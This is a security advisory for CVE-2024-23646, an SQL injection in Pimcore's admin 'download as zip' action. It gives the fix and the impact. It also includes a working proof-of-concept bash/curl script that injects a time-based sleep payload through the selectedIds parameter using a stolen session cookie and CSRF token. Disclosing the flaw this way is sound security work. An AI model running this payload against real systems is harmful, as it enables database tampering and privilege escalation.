CVE-2024-23646

HIGH8.8EPSS 0.14%

SQL Injection in Admin download files as zip

發布日:2024/1/24修改日:2024/2/16
也稱為:GHSA-cwx6-4wmf-c6xv

描述

### Summary The application allows to create zip files from available files on the site. The parameter "selectedIds", is susceptible to SQL Injection. ### Details [downloadAsZipJobsAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006) escape parameters, but [downloadAsZipAddFilesAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087) not. The following code should be added: ``` foreach ($selectedIds as $selectedId) { if ($selectedId) { $quotedSelectedIds[] = $db->quote($selectedId); } } ``` ### PoC - Set up an example project as described on https://github.com/pimcore/demon (demo package with example content) - Log In. Grab the `X-pimcore-csrf-token` header from any request to the backend, as well as the `PHPSESSID` cookie. - Run the following script, substituting the values accordingly: ``` #!/bin/bash BASE_URL=http://localhost # REPLACE THIS! CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e" # REPLACE THIS! COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3" # REPLACE THIS! SQL="(select*from(select(sleep(6)))a)" curl "${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01" \ -X GET \ -H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \ -H "Cookie: ${COOKIE}" ` ``` - The response is delayed by 6 seconds. ### Impact Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.

受影響套件(1)

CVSS 分數

來源版本嚴重程度向量
osvCVSS 3.1HIGH8.8CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

參考連結(7)